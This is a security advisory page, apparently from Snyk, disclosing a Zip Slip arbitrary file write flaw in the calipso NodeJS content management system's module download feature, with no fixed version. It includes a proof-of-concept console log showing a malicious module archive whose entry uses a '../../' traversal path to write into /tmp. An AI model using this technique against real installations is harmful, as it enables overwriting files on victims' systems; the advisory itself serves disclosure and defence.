Arbitrary File Write via Archive Extraction (Zip Slip) Affecting calipso package, versions *



    Exploit Maturity Mature
    Attack Complexity Low
    Confidentiality High
Expand this section
7.1 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-CALIPSO-1300555
  • published 7 Jun 2021
  • disclosed 6 Jun 2021
  • credit Sam Sanoop of Snyk Security Team

How to fix?

There is no fixed version for calipso.


calipso is a Calipso is a simple NodeJS content management system based on Express, Connect & Mongoose.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible for a malicious module to overwrite files on an arbitrary file system through the module install functionality.


 ✗ calipso modules download
Launching calipso from: /home/snoopy/MySite
Calipso directory: /home/snoopy/.nvm/versions/node/v8.17.0/lib/node_modules/calipso/lib/../

Resolving file location, and downloading ... (node:14850) [DEP0029] DeprecationWarning: util.error is deprecated. Use console.error instead. Redirecting to ...

Resolving file location, and downloading ... [0%...25%....50%....75%....100%]

Downloaded ../../../../../../../../tmp/foo.txt 0 Downloaded evil/.gitignore 89 Downloaded evil/elastic.js 8757 Downloaded evil/templates/results.html 1220 Downloaded evil/package.json 409 Downloaded evil/test.txt 4 Downloaded evil/README 0 /home/snoopy/MySite/modules/downloaded/elastic/ Installing elastic via npm, output will show below (may be a small delay):